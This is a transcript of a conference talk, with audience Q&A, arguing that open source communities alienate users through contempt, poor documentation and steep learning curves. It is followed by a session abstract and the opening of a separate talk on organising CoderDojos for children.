inspiration for our five ways we can show deep hatred towards our users. This one is great. This software is just for Brainiac me. I do not care about your needs. I am not here to make this work for you. Now there is something to be said for the fact that it is very fair that open source is motivated again to use the common phrase scratching your own itch, creating something that you yourself need. And that is great. There is nothing wrong with that. But the idea that if someone comes along and has improvements to contribute, has questions about how something works or effectively wants to get involved but they do not quite know how. And the response that they receive is basically something along the lines of there is the door, thank you very much, except usually it is said with many more swear words that I am not going to use because we are on video, that would be inappropriate. So the idea that the software that we create is only for people who are just like us, people who are super geniuses, people who are highly, highly technical, people who fully understand the systems that they are using. And if you are not cool like me, you do not get to do this. This is not for you. This is not something that you need to be involved in. I do not need to care about your needs. And that is really, again, that is very sad because it denies us the opportunity to help more people get involved with open source software and understanding the value of it, not just from a technical perspective, but also from a social perspective. If it is only something for the wizards and the magicians and the genius programmers of the world, it is not accessible to everyone and not everyone can benefit from it. Stupid user memes. I have to admit that I may have engaged in some stupid user memeing once upon a time because I was the accidental techie for my recruiting department when I worked in HR once upon a time where I decided that I really liked talking to nerds all day about their technical ambitions, but wow, did I not want to work in human resources ever again. So we create these ideas that our users are idiots and then we trade pictures online about how they are all dumb. Or we have admittedly, I think, hilarious TV shows like the IT crowd about how all users are stupid, where the guy picks up the phone and all he ever says is, have you tried turning it on and turning it back off again? If it were just that easy all of the time, I think we would have less difficulty. Although I have also been told by someone in the audience last time we gave this presentation that I was giving people far too much credit and I had clearly never worked a help desk. And I said, actually, I had worked a help desk. I had worked a help desk for our applicant tracking system once upon a time and that stint in human resources. And I actually found that more often than not it was a lack of vocabulary on the part of my users. We just weren't using the same words for the same things. So I didn't, you know, but I still occasionally engaged in mocking them. But we have this idea that our users are dumb, like immediately upon approaching them, right? We think that they lie, that if they say that they are experiencing a particular problem, they're not really experiencing that problem, they just want to call us up and vex us and piss us off. Or they just want to file a useless buck report and complain and bitch. And I just don't feel like that's accurate. And I think that immersing ourselves in these kinds of images and memes about how our users are stupid, useless, and terrible doesn't help us create empathy with the people who are using our software. This one is the bane of my existence. So no, I know better. How many of you are maintainers of a free-to-opener software project? I see a couple hands in the room. How many people come to you with feature requests that are silly? Ah, yes, okay. John's like, I get all the silly feature requests, all of them. So admittedly, there are times when people will ask for something of you or of a project that doesn't make a lot of sense. My favorite example of this is once upon a time I used to share a cubicle with a gentleman by the name of Carl Fogle who wrote the seminal work producing open-source software how to run a successful free software project. And amongst his many accomplishments, Carl Fogle was one of the original developers of the subversion-version-control system, which some of you in the room may remember as being the cool thing before we all had Git. And it might still be cool, but apparently not because the kids these days have never even heard of it. So the subversion project said in their mission statement that their goal was to create a compelling alternative to CVS, to the CVS version-control system. Great. So one day, some wonderful human being showed up on their mailing list and said, I know what you guys should do. You should just sit there and like stop working on the subversion thing and just like work on CVS, right? That's going to be great. Not really. That was not what they intended to do. And I'm not talking about those moments of not listening to people who do drive-by random ridiculous requests of you because those are drive-by random ridiculous requests. But if someone comes to you with an idea that's largely sane, maybe you just don't want to implement their idea. Maybe you just don't want to do your software to work in that particular way. But it's still a sane idea. Not listening to them because you know better is really a problem. I know that it can be exhausting to interact with other people. I have a hard enough time dealing with myself, let alone other human beings. But actually taking the time to explain to someone why their idea may not be the best for the project is a great idea or assuming that they might have something to teach you. Actually letting them explain to you what their issue is, why they're experiencing it, and what they would like to see different is actually, I think, a very fruitful source of dialogue. So it may be that you don't want to do exactly what they're telling you to do, but you can get a great deal of information about why what you have created is suboptimal if you just listen to their frustrations and what problem they are actually trying to solve. And I found that that to be a hugely fruitful source of information when working on software projects and trying to help people with, say, user experience design because folks will come and tell you that what they want is, and this is a very common phrase in the United States, I want a faster horse when really what they want is a car. But if you help, if you walk through what their use case is and what their needs are, then you're actually going to get useful information that can be beneficial to you, the maintainer. My other favorite, you're just not technical. How often have you had someone who is not a developer, not in the tech industry, come to you and ask you if they will fix, can you please fix my computer? Okay. And how often did you just want to just tell them, like, no, I will not fix your computer? Yes, okay. So now, did you get frustrated with them immediately because you were thinking, like, you're not technical, you're just kind of an idiot and like, I don't want to deal with you. Another set of people who are like, not technical and idiots yet again. Yeah, okay. That's totally fair, right? That's human. That is completely human thing to do. I am personally deeply offended by this phrase for a number of reasons. One, I think it is ridiculous to define someone by what they are not, right? If all we can do is understand the people that we're interacting with in the context of what they don't do, what they are not capable of, we put them in this very sad space where they can't improve, they can't become better, they can't acquire knowledge, they can't interact with us in a way that is mutually beneficial because they are not something. They are this other thing. They are this not technical thing. And this not technical box over here is something that you can never escape from and nothing will ever be good inside that not technical box. And I also find it very frustrating as a phrase because it is completely meaningless. What does this mean? What is not technical? So is an astrophysicist not technical because that person is not a computer scientist? I don't think that we would necessarily think that. I have been told that my mom is not technical because she still calls me and I remind her to turn the computer on and off again. My mom was one of the first UNIX programmers. She hasn't kept up with her technical skillset, but I would never say that she was not technical just because she does not eat, sleep, and breathe software development anymore. The idea that we can simply dismiss someone's concerns because they are somehow not like us. They are not a developer or maybe they are a developer but they are a developer in a different language and those PHP people are silly or those Ruby people are silly or you are not as good as I am. It creates a really sad dynamic in our interactions with people. And again, we cut ourselves off from the opportunity to learn something useful from folks who are taking their time and energy to give us feedback when we simply put them in this box and say you are not technical, there is nothing useful that I can learn from you. Then we have this idea of kind of like this is more of a meta idea but the users as faceless icons. How many folks are developing anything that has a graphical user interface? Okay, so a couple hands. Mostly systems programmers in this audience I would assume are system ins. I see some nods. I see some people nodding off to sleep. That's fair too. So we have seen over time and I actually find this to be a really compelling development. We have seen over time this kind of evolution from the idea of people pictures and our software going from these weird little kind of chess pawn nebulous things in weird colors. Smurfs are blue, people are not blue just in case anyone was wondering. To actually icons that look like people. But this doesn't seem like it's that big of a deal until you start reading things like the explosion of excitement on social media when they created emojis that were not showing people with white skin tone for example. Suddenly people are saying hey, someone finally created something that looks like me. I feel so good about this. This is great. So when we actually take the opportunity to build into the appearance of our software, the idea that there are actual people using it, not weird chess smurf things, then we actually create an empathetic relationship with our users. We care about their needs. We want to meet them and their needs matter to us. So we're moving away from this kind of era of our users are these faceless icons. They kind of don't exist. They're this fictional element of stupidity over here while we make something beautiful and hope they don't screw it up too much and we thank God that we are not on call. Because when they screw it up, we don't hear about it. I think that this is all kind of wrapping up into a nice little package of generally like prickly attitudes around open source software projects. This is clearly not true of all projects, but there are some that are notorious shall we say for prickly attitudes. Before I was presenting at FrostCon, I was presenting at the OpenSim conference in Berlin, which is an academic conference about the study of open source software by academics. I was honored to sit on a presentation by a professor named Megan Squire. She had done a linguistic analysis of the Linux kernel mailing list, which shows that she was a very brave woman to begin with. What she wanted to know was was there a difference in communication style amongst the participants in the Linux kernel project because it was well known that this was a, you know, you enter the LKML only with asbestos underpants on and maybe not even then. It was very interesting because the thing that has stuck in my mind the most was she was doing a measurement of the number of times that people said thank you or the probability that if someone said thanks in an email, who would it be? If the word thanks was used in email comparing two of the top folks in the project, and I'm not going to name names here because I'm not trying to slam any particular individual, just making a point, maintainer A was there was a 2% likelihood that he said thanks, whereas maintainer B, who was a little bit further down the food chain, was the percentage possibility that he said thanks was 98%. So again, we have this ingrained in our culture that it's okay to be rude, to be offensive, to be very, I don't know if there is a non-swery word to say this, to be very a-holish in our discussions with other people. It's okay to do that. So one of the projects that I'm most excited about having worked on was the Google Code and Program, which was a way to introduce students who were in high school and even younger to open source development, and not just software development, but also documentation, user experience design, marketing, all of the aspects of creating software. And for the very first year, we had some participants from the Plone Project, which is a Python-based content management system, which I'm not sure if anyone is using it anymore, but hopefully they are. So these folks were having a conference at Google at the same time. I'll see you as a host of a bunch of open source software conferences back in the day. And it just so happened that one of the students who had participated in the program with the Plone Project lived three or four miles away, and he noticed that all of his heroes, all the people he'd been working with were going to be in town, and he emailed me and asked if he could come visit. And I thought that that was a great idea, and I checked around with the conference attendees, and they also thought it was a great idea. And so Jonathan came down to the Google HQ and met everybody. And so, of course, this being a 14-year-old young human, his mother drove him to Google HQ. So that was really cool, and it was great. And there was photo ops, and everyone was really excited to meet him, and they thought he was really brilliant. And it was great. It was a really touching moment. But the best part of the day was when the lead maintainer for the Plone Project all of a sudden just sort of stops what he's doing, kind of looks around, eyes shifting left to right, and then he goes over to this young man's mother and says, ma'am, I don't know if you've ever read our mailing list. And she said, what do you mean? And he said, well, you know, we call each other idiots a lot. And say that the other person's a moron, and that their ideas are stupid, and we don't understand why. We're not very nice to each other. We're really not very nice to each other. We just want you to know that that's all a joke. We actually, we really like each other. We really care for each other. We're all friends in real life. Like we go out, and we get beers, and we go to each other's weddings, and we go over to each other's houses for barbecues. And we just want you to know we're not really like that. So now the best part was her response, which was, oh, please, son. I have another son who's a gamer. You're fine. But again, we are so acculturated to the idea that if we are amongst friends, that we can be very vitriolic, very unkind in our speech to one another. And this tends to boil over into our discussions with everyone, even people who are not close enough to us to understand that maybe this is just kind of the family in-joke, family rivalry, right? We have acculturated ourselves to the idea that it is OK to be rude, to be unkind, to be unwelcoming, to be prickly like cacti, right? And this, again, this is unfortunate because it cuts us off from the opportunity to learn more about what our users need from us and to welcome them into the fold of using and contributing to open source software. Now I want to talk about the people that you probably think I don't know about giving this talk. Whitey Entitled Demanding Terrible People. How many of you have dealt with Whitey Entitled Demanding Awful Users? And almost every hand in the room goes up. And I bet when you deal with those folks, your immediate response is to say, you know, I work on this during my free time or I certainly don't get paid enough to deal with you being a big jerk to me, please, you know, forward yourself to the nearest, like, wastebasket over there, thanks. I'm not here to advocate that anyone put up with bad behavior from their users. If someone is treating you with disrespect, if someone is coming to you and suggesting that you spend your free time developing a feature that they require for their business enterprise and they can't even be bothered to say thank you when you actually develop that feature, like, forget it. Like this is not behavior that I think anyone should be putting up with. I recently read a very, it was just super sad to read it, a post from a maintainer of a very popular library who basically said that he was looking for a maintainer for the three libraries that he was working on because they had grown in popularity much more than he had ever expected. He had just put them up on GitHub because they were useful to him. And suddenly there were all kinds of people relying on what he had built and that he basically talked about the stories of, you know, he had had a, he was married, he had recently had a young child and, you know, he had just gotten off of a stint where his day job ended on Friday and he had literally worked from the time he got off of work on that Friday all weekend without sleep, without spending any time with his wife or his young child because someone had filed an issue and said this bug is taking down our website. We are losing sales. If this doesn't get corrected, I am going to get fired. Please, please help me. And this is a good person, right? He just, this is terrible. I don't want this company to go under. I don't want these people to lose their jobs. I don't want this person to get fired because their manager doesn't understand it's not their fault. So he works tirelessly for more than 48 hours to fix this bug. He commits the fix. He puts a note into the GitHub issue that it's been fixed. Please try it out. Let me know that it works. I hope that everything is going to be okay for you guys. Like I wish you the best of success with your business. And he never heard a word. Not even, not even it works. Not even a thank you, just nothing. Now I under no circumstances suggest that anybody should put up with that kind of behavior. I want to talk about creating a reciprocal relationship of respect, compassion, and empathy between developers and users. If people are coming and are refusing to contribute with at least their thanks, if not money for pizza or even heaven for fend, you know, money for your living expenses for hard work that you do in your free time, you don't have to put up with that. That is not okay. This is, by no means am I suggesting some kind of asymmetrical relationship is okay just because we all have to be, you know, have hands across the world and be nice to each other. So I just wanted to make that very clear in case anyone thought that I was suggesting that the software developers of the world suddenly had to become like the world's, you know, unpaid therapists. Like that is not your job. Poor documentation. This is very sad. How many, how many issues do folks realistically think are the result of poor documentation? Like just, okay, show of hands. How many people believe that no one reads the manual? This is very sad. Okay, so about half the room thinks no one reads the manual. Okay. Of those who said that no one reads the manual, how many of you believe that no one reads the manual because there actually is no manual? And about half the hands in the room go up. Okay, very fair. For those of you who think that people do read the manual, how often do you think the manual is actually filled with current information that talks about the current release of the software? There's one hand. Oh my goodness, you poor, deluded soul. It is not true. It is not true. We create, I think this feedback loop of sadness with our users because those who are the most motivated to create software are the least motivated to document it. Right? And fair enough. But again, if you are working in that paradigm, it is very sad to have this kind of poor attitude towards folks who are not software developers who are not technical, who are doing things like technical writing, because clearly technical writing is not technical, who are creating documentation for our projects and helping people be better able to use what we're producing. And there are, for some programmers, for some projects, a lack of documentation is like a badge of honor, right? Well yeah, there is no documentation, but you can just read the code, right? And then you know how it's working. Well yeah, sure. I mean, that's true for some people. I have waited into source code a number of times trying to figure out why something was broken and going like, why am I feeling stupid and inadequate and going like, why can I not make this work? Well, you know, every once in a while you get validated because you're like, hey, wait, I think I found a bug. Like, oh yeah, you're right. That doesn't work because of... It's not you. Well, wonderful. Thank you. And I'm so excited that I had to pour through like, you know, 2,000 lines of source code to figure out that it was your bug and not my stupidity. Like maybe if there had been a manual, I could have said this does not work as expected. Unfortunately, in order to figure out what was expected, I had to go and perform checkouts and things that I did not want to do. So, poor documentation, I think, is a source of a lot of consternation. So if you are not motivated to document what you are working on, make friends with someone who loves to document stuff. And believe me, those people do exist. And they like whiskey. So just... They really do. So, you know, get whiskey and old books. So if you can find a used bookstore that has cool stuff in it and a nice, you know, whiskey bar, you're in heaven, right? Go make friends with those people and they will help you out immensely. Now, let's talk about the current industry, darling, and how this is the polar opposite of what most people are using, experiencing with open-source software. How many folks in the audience have heard of Slack? Wow. Okay. Have heard of Slack and wish they had never, never heard of it. So there are some free software implementations of the same kind of functionality that Slack has, matter most being one of them. So Slack has gained in popularity to a ridiculous degree, right? So first of all, the startup that has created Slack is now worth something like a billion dollars, which I think is the byproduct of creating a great product, but also Silicon Valley Insanity. And... But if you look at Slack as a tool, merely as a tool, Slack has a core value of helping their users be more effective with using the tool built into the product, right? So you pop up in Slack and there will be suggestions for keyboard shortcuts while it's loading, right? And they're not intrusive because they're just all part of the load screen, right? It's not as though, you know, it's one of those irritating feature tours that will not turn off no matter how many times you say, never show me this tour at startup again. And yes, you click that box and no, it just ignores you. That's not what's going on, right? They have understood that there are non-intrusive ways to slowly but surely remind and educate their users about how to be more effective with what they've created. Now this to me is a great development. This is a wonderful and important thing, but it frightens me because there are a number of free software projects who have stopped using IRC altogether as their communication mechanism, right? And now they're using Slack solely for their communications. Now this is problematic for a number of reasons, not the least of which is all of your logs are belong to some company, which I actually, I have great respect for the folks who work at Slack and I think that they're doing a great job. But I find that development to be problematic, right? We've had this open communications tool since forever and now people are not using it and they aren't using it because they find that their users and people that they are trying to integrate into their project communities find IRC too hard to use. So how many folks in the audience are IRC users? Okay, about half the hands, maybe more than half the hands are going up. So do you think using IRC is easy? Yes. Anyone think using IRC is hard? One, two, okay, three. Okay, wow. Brave souls who are willing to admit that this is true, that IRC is hard. So I had a very recent experience where I was working with a young woman who wanted to volunteer as a member of the open source initiative. So I am on the board of directors for the open source initiative. They are the nonprofit organization that approves new open source software licenses and who protect and promote the value of open source software worldwide. So I'm a volunteer there and I was working with someone who wanted to volunteer to help us find more volunteer help to do work that was good for the OSI like documenting best practices for open source employment practices and things of that nature. So she came to me and she said, you know, well, I have this volunteer plan and here's what we're going to do and we're going to set up this Slack channel and we're going to invite people in for office hours and it was a good plan. It was a very good plan but I did point out to her that she probably wanted to rethink the plan in the context of using IRC because as the OSI, as the open source initiative, using a proprietary tool for communications with volunteers could potentially send the wrong message and maybe that wasn't the way that we wanted to go about it. And she said, so what do I do? And I said, well, do you like talking in the browser? And she said, yeah. And I said, okay, great. So there's this tool that's proprietary but if you want to use it, that's fine. It's called IRC Cloud. You go to IRCCloud.com, you sign in and then, oh, yeah, well, okay. So that's great. So you're going to sign in with your email address and that's wonderful but then you have to pick a nickname. Okay, and then you have to authenticate to Nick serve and you should, and then you have to set your flags so that if you want to not listen to someone in the channel and like, oh, yeah, no, if you just type these commands, you can get the manual and she just looked at me and she was like, why are we not using Slack again? And I felt like I didn't have a good answer for her. This is so much overhead for so many people. And we're in a place now where it's not like it once was where those who are the creators of technology are over here in their own bubble and there are very few consumers, right? People who are the consumers of technology at this point are everyone. And if we make it difficult for them to get involved in the discussions that we have, we're going to drive them into the arms of something that makes it very easy for them to participate and where it's easy to participate, the rest of us who are deeply concerned with issues like can we have the logs of the discussion of the software project forever? Is this someplace where academic researchers studying FOS are able to get this information and query it? If we lose that, there's a problem and we're not losing that because users are stupid. We're losing that because the tools that we use seem to be so arcane to them. And then we turn to them and we tell them, no, no, no, no, it's easy and it is not easy, right? And we have this knowledge that we have had in our heads for so long because we've been doing this for such a long time that it just seems easy when really it's not. So we have ridiculously steep learning curves in open source projects. I love this. This diagram has been used for all kinds of things. This particular incarnation is MMORPGs. But this I was first introduced to as the learning curve for Drupal. And Drupal is considered to be one of the more user-friendly content management systems out there, right? So we think of steep learning curves as something to be proud of, right? Well, you have to work really, really hard and eventually you become a master at what it is that you're doing. And fair enough, right? It takes a certain amount of time and energy invested to become skillful. We know this to be true. But it's almost like this bizarre hazing ritual, right? Like, well, you know, I had to work really, really hard and no one helped me and there was no manual when I did it. And you know, it took me forever to figure it out and I had to read all the source code myself. This is not something to be proud of, right? This is not something that there is no badge of honor in making someone suffer as you have suffered. That's just sad, right? Instead of having these steep learning curves and being like, woohoo, yeah, that was really hard. We're proud of ourselves. Again, making it easy for people to engage with us. Not that they should have to do no work. Not that they should have to have no investment. Not that they should have to have no effort. But to lower that barrier to entry so that at least becomes possible for them and they're not one of these poor little people falling off the cliff or hanging themselves at the thought of using your software. Like, no one wants to be at the software project where the little stick figures are hanging themselves. It's like XKCD just had a sad moment right there. So, and things that are, I love this one. Not that I'm a VI user and thinking the Emacs learning curve is great. So now think about the things that we say are easy, right? So text editors are easy, right? It's so easy. You just want to type some text and then save a file and you're done at Hallelujah. Okay, and then we make fun of people for using tools that are too easy like Notepad. Oh, man. You're using Notepad. You're not using like Geddit or, let's see, once upon a time I was a happy VI user and now I have submitted to Geddit. But, right, we talk about people who are using the quote unquote easy versions of these, the ones where some of the complexity is abstracted away as being idiots or, you know, they're using the easy tool or, you know, but the rest of this stuff is easy too once you just figured out. And this is not, this is not fair. Our users don't care about, you know, various key bindings and learning arcane commands that really made sense 25 years ago. They just want to type a text file and hit save and be able to print it out and not have it go off the pace of paper and wonder why that happened because they do not know about the line wrap, right? Like, we cannot consistently think of things as easy and have contempt for people when they can't figure it out themselves. It's just, it's just ineffective. Instead of getting people through these steep learning curves, I want to get them through what Kathy Sierra, the author of a book called Creating Passionate Users, calls the kick ass curve, right? So how soon can you help your users kick ass? How soon can you help them to be ridiculously productive and doing all the things that they wanted to do with your tool? And as you can see from this awesome diagram, which I mostly like just because it says kick ass in it, you know, there is a suck threshold, right? There is always going to be a time when you're learning something new that it sucks. It's not fun. You feel stupid. You wish you knew more, right? These things are just not awesome. But that's fine. The idea is getting somebody through that suck threshold as quickly as possible so that they are kicking ass and then they become passionate advocates for what you're doing and they become contributors. People who feel good about the technology that they're using will tell other people to use it. People who feel good about the technology that they're using will say, we hope, thank you if they don't send them to me and I will explain what they should. People who feel passionate and good about what they're doing are just happier users and our happy users are going to create happy communities because there's going to be more folks participating in free and open source software projects because they understand its value and they feel good about being there instead of feeling foolish or ashamed or like people think they're stupid. Well that is very fair. The gentleman has remarked and I do not know that I can necessarily disprove his claim that many people are stupid so people are passionate about stupid technology. If anybody was attending Mr. Holly's keynote yesterday, there was a great deal of stupid technology on display including the Bluetooth enabled pregnancy test which was not good. Also apparently things I learned, did you know that your Fitbit broadcasts information to any device that is trying to collect Fitbit information so if you're all wearing a Fitbit and I sink to the cloud, I get all your data. People really like their Fitbits. I could call that stupid. I don't know that we're going to solve the problem of people doing silly things. I think it's just part of the human condition and why we are always learning. But at the very least we can assume that people who are passionate about stupid things, like you're not working on the stupid things, right? So if you're not working on the stupid things, you don't have to spend any time with those people. So at least that's better for you, right? Unless you're getting paid to work on stupid things in which case that's cool, you can get a different gig. So I think one of the reasons why we have this issue within our community where we're unkind to our users is because we have this relentless pursuit of perfection, right? We want to create the most amazing possible thing and something that is not stupid and that people will not be passionate about using something stupid. And this is not only not good for our user community, I don't think it's good for us, right? Like how often have you ever, like either at work or even working on a free software project, like worked with a developer who just will not stop working on that feature over there on their own in private because they don't want to show anyone their work in progress because it's really embarrassing. No hands? Wow, people have really emotionally evolved in my 10 years of experience with this stuff. Okay, so there's like five hands. Okay, well, clearly we have improved and that is lovely. But in my past experience at least, I've seen a great deal of people who simply because there is this relentless emphasis on quality or even this fear of being mocked or shamed or told that you're an idiot if you submit the wrong feature to the mailing list, right? For discussion. That people, we have this adversarial approach because we are so focused on everything being so great, right? The perfect becomes the enemy of the good when really we want something that just works. This is sad and I don't know what it says so we're going to skip it and say quality is good. We like quality. So I want to conclude with a story that I think illustrates everything that I've been talking to you folks about today. And this is the story of a young woman by the name of Angela Byron. So once upon a time, Google Summer of Code was created and Google Summer of Code for those who are not familiar with it is a program in which Google pays university students to work on open source software projects and all they work with a mentor from that open source project. The open source project is usually not technology that's used by Google or any particular company. And the idea is simply to give students access to real world software development experience so that when they show up at companies, they haven't only worked on lab projects with like two or three students involved with them and that never had to be maintained. So the real world experience. So Angie had always been interested in this whole open source thing. It really jived with her political views as a young woman. She really thought it was cool that there was this notion of free speech as part of the software development process. But she never thought that she would be good enough to be an open source developer. Those people are geniuses, not like me. She was a community college student. I don't know if there's an analog here in Germany. I guess like trade school, like you go to university for like two years instead of four years. So, you know, not as prestigious as a university education. And so, you know, she just, she thought it was super cool but not for her. And then this program came along and it was like, well, wow, you know, hey, if they're saying that it could be college students, like I could do that. I want to apply. I want to be involved. So as part of the first ever summer of code, Angie was asked to work on the Drupal project. Groovy. So she wanders into Pound Drupal and says, like, hi, I'm really excited to be here. My name's Angie and I'm one of your summer of code students and I'm really looking forward to this and I've been writing PHP for this long. And I think it's really great and I'm really excited about open source software and this is all going to be super cool and like, this is going to be great and I'm really excited and this was the response she got. Go away. This channel is for serious developers only. Right? Now mind you, this is someone who had been invited to participate in the project as someone with very little experience, right? This was, this is very suboptimal. This is, and these pictures, by the way, are a comic that Angie drew years later to talk about her first experience interacting with the Drupal project. So this is from the horse's mouth, as they say. And this was her reaction. And I love this because she's hiding under a blanket, which is, this is supposed to be a blanket. So she just had a miserable time and she was very sad and it was horrible and she went away and were it not for the fact that she had committed to do this like super fancy program with the Google people, she just would have stopped doing open source, period. So that was once upon a time in 2005. Today Angela Byron is one of the cornerstones of the Drupal project. She was the maintainer for, if I remember correctly, Drupal 7. She has been working as a community advocate. She has tirelessly helped to get more people involved in open source software, particularly through onboarding mechanisms like Drupal's Dojo project where newcomers to the project are paired with a mentor and kind of pulled through that steep learning curve that many people are proud of. And again, if she hadn't had the benefit of that experience that she had to keep going because this was some big fancy project with Google, we would have lost her. We would have lost her because we would have said, go away, you're stupid, this channel is for serious developers only, and you have nothing to offer us. You are not technical, you are not cool enough, users are stupid, go away. And this is why I keep advocating that when we carry these attitudes within ourselves, and this is how we behave, we cut ourselves up from the opportunity of finding the Angela Byron's of the world, right? We cut ourselves off from the opportunity to learn, to grow, and to potentially find people who can completely change the face of our project. And I just want to end with a quick plug too. When we carry those attitudes, more often than not, that attitude is you are not enough like me to be cool. You are not a developer like me, you do not understand, see like me, you do not do systems programming like me, et cetera. When we carry these attitudes, what we're really doing is effectively saying you're not like me, so you're not good enough. And when we think that people who are not like us are not good enough to help us be better, they're not good enough to give us good feedback, they're not good enough to give us something that is valuable and worthwhile, we create stuff that sucks, and it sucks because it's only good for us, and ostensibly we'd like it to be useful to the much wider world, otherwise why would we release it to the wider world? And that, my friends, is my rant. I am your user, please love me. Thank you. I love FrostCon because this is the only conference where I actually managed to speak for the appropriate length of time instead of speaking really quickly and going, oh, I should have told everybody about the international symbol of slow down. If I'm speaking too fast, you should slow down. Well, obviously that's not useful for now. Excellent. Well, bug file. I'll get it next time. Folks, are there any questions? Beep, beep, beep, beep. Nice man on the stairs. What is your question? I was interested in talking about정 So my question is, I guess, is it a problem? Paper is made from trees. And is it? OK, just checking. What's the useful way of bringing that? Because it's easy to say the users have done, they want the wrong things. We're doing something much cooler than that. Yes. But obviously, that's not going to help. That's just going to drive people away. So as I was saying, it's not making stuff. So you put up people making. How can we get past that to maybe somehow more gently? No, we direct more. We're getting to use this to define what companies are actually going to do the way they want. They actually need the wrong things. OK, so I think to call us that question, the question is, how can we interact with our user community so that they are, instead of asking us for a faster horse, they are asking us for a car? So I think that that really goes back to education. And this, again, is where poor documentation bites us in the rear end. So somebody expects you to work on a compelling, it expects you to work on CVS when what you really want to do is create something that's an alternative to it. The only way that you are going to help nudge them in the right direction is to explain to them very clearly what it is you're doing and why you are doing it that way. And sometimes this is as simple as a one minute video tutorial that's like a screencast of going through some common commands using your program so that somebody understands, like, oh, this is what I need to do. Often people come to a new piece of software with a lot of legacy assumptions about how it's supposed to work because of everything that they've used before. And if what you're providing them doesn't look familiar to them, they go, wait, no, no, no, I want what I had before. Forgetting all of the pain points that took sent them screaming from this horrible thing before to the new thing. So again, taking people through the feature set and the whens and the hows and the whys, even if it's just really briefly, it's very easy to pop open your video capturing software of choice. Or if you're OK with using proprietary software, you can just open up a Google Hangout and say, here's what I'm doing. Here's why it works this way. Here's why I think this will help make you more productive. Or why it will be easier for you to use what I've created this way. Thanks so much. And then you can point people back to that. If someone comes along and says something to you, you're very silly, you're just excellent. I see that maybe you have not watched the video tutorial. And the video tutorial will take two whole minutes of your life. And that's all you need. So go watch it. Education is key, I think. And sometimes people are going to just ask you for silly stuff. And the best way to nudge them is to nudge them towards somebody's project that you don't like. No, wait, I would never advocate that. Any other questions? Yes, nice man sitting right there. I'm sorry about technical users. Yes, OK, so this is an excellent question. For technical users, how do you move them from being users to contributors? So I'm going to start with the horrible lawyer answer of it depends. But I think that one of the ways to make that possible is to make sure that your users are most fully empowered. And actually, rather than trying to go into a very long explanation of this, I would like to refer you to a piece by a gentleman by the name of Mikhail Rogers, who wrote about the processes of creating the Node.js Foundation and the different layers of involvement. And their specific plan for moving users to contributors had a lot to do with their governance model and how they encouraged participation in the project. So if you were a bug reporter and then you were encouraged to submit a patch and people would mentor you through the process of creating one, making sure you knew about the style guide. So it was a combination of advocacy, education, and telling people that they were appreciated. I think a lot of getting people from going from drive by random comment to sticking around is letting them know that you care. Like, I actually appreciate the fact that you're there. And in turn, I would like you to appreciate the fact that I've worked really hard on what I've created. I do not remember the article title, but I will get it for you. I think it's awesome. Other humans who want to ask things, machines that want to. Ah, up in the back. Hello, nice person. Yes. So the question is, in order to make sure that people are effectively able to participate in the open source community, do we need to put the user first as part of the design process? Because that seems very rare. And I am going to say yes. Yes, absolutely. I think that this is a great idea. And we should totally do this. And I appreciate the point that you made about having a responsibility to do that. Because I really feel like if we do not put a focus on the end user as part of our software development processes, exactly as you said, people will not use free software. I think Benjamin Mako-Hills essay about the fact that for a user of free software, the most important feature of that software is that it is free. And I respect that a great deal. But I cannot go to my family and tell them, please, please, please make use of free and open source software, because it's so important, because it's free. It respects your freedom. They're going to say, yes, that's great, Blondie. Thank you. I just need to edit a text file. And so without that relentless focus on the user and quality for the user, we're going to lose people. And I think that it has sad implications for us as technologists. But I think it has sadder implications for the way the world works. So thank you. I appreciate your point. Anybody else? Because if not, we can all go get coffee, which, you know, is compelling. Thank you very much for coming. Appreciate it. Thank you.
|
Open source software projects can be prickly toward their users. Poor documentation, a steep learning curve, and a finely tuned focus on excellence and quality can make a project community seem hostile. As users of many different open source projects over the years, Leslie Hawthorn has often wondered about this problem and contemplated what to do about it. This session takes some long-standing private rants public.
|
10.5446/32443 (DOI)
|
Hallo, willkommen zu diesem Vortrag, den wird der Lukas für uns halten. Er wird uns ein bisschen was erzählen über Coda Dojos, wie man die aufbaut. Und ich würde einfach mal die Bühne für ihn freigeben. Wenn ihr Fragen habt, wird auch aufgezeichnet. Er wird die nochmal wiederholen. Viel Spaß. As mentioned in the program, I will be speaking in English because I know for a fact that at least one person in the audience doesn't speak German. Kann jemand kein Englisch? Very good. Okay, so the rest of the talk will be in English. So, the first question you might ask yourself is what is a Coda Dojo? For me, a Coda Dojo is mainly a room to learn. It is a room where you go and you can learn anything. A Coda Dojo, of course, has something to do with coding. You learn how to code something. But for us, for our Dojo, this can mean a lot of things. It can mean electronics, it can mean encryption, it can mean a lot of things that have to do with computers. The Coda Dojo movement is a global thing. There are Coda Dojos all over the world. It started in Ireland, but now there are Coda Dojos in every continent. The mission of Coda Dojo is to teach kids and slightly older kids to learn to code. The kids and the Dojos are between 17-years-old, but there are some Dojos that also take even older kids and grown-ups into their program. The original mission was to teach kids. Okay, so that's Coda Dojo. I'm Lucas. I work for a company called InnoQ. I do programming stuff, like probably most of you. That's all you need to know about me. There are a lot of Coda Dojos in Germany. In Germany, in Germany, in all of the Coda Dojos, there might be more. This is why there is a dot, dot, dot at the end. Some of the Coda Dojos were founded this year. Some exist for many, many years. There is one Coda Dojo that I have the most experience with. That's the Coda Dojo in Cologne, in Cologne, because I'm organizing it. I'm organizing it for now about two and a half years. So I can tell you basically anything about this particular Dojo. It's very important that not every Coda Dojo is the same thing. Every Coda Dojo has a lot of freedom how to do what they want to do. In my opinion, when you want to do a Coda Dojo, you have to find your passion and what you want to teach. If your passion is to teach everyone only JavaScript, then that's okay. That's a valid Coda Dojo. Every Coda Dojo is very, very different. Some meet every day, some meet every week, some meet every month, some meet only from time to time. All that is still Coda Dojo. So, about our Dojo. Our Dojo was founded by Ellie Weigner in 2013, but Ellie had a lot to do, so she said, I can't do this Dojo any longer. So I took over the organization of this Dojo in 2014. And since then, we are doing one Dojo per month with few exceptions. For example, this month. But normally we only skipped the December Dojo, because Christmas is hard to find enough mentors shortly before Christmas, because of Christmas shopping and stuff like that. So we traditionally skip the December slot, but all the other ones, yeah, we still do them. Okay, so, when you want to get started with your own Coda Dojo, I think there are four things you need. You need some goals for your Dojo, what you want to do. You need coaches, you need a location or more, and you need kids to come to your Dojo, because without that it wouldn't be a lot of a Coda Dojo. So, I will talk about how we did it. This is not the only way to do it, as I said. But you can take it as an inspiration. You can also disagree with me in the question and answer section later on, and say, we want to do it like this, and I think this is a better way. We can also change our approach to it, because we are also open to adjust our Dojo, when there are better ideas coming in. So, our main goal is to inspire kids to do programming and technology. It's not to teach them everything. It's mainly to inspire them, because in schools a lot of kids are not inspired to get into technology. They only learn Excel and Word, and they are not 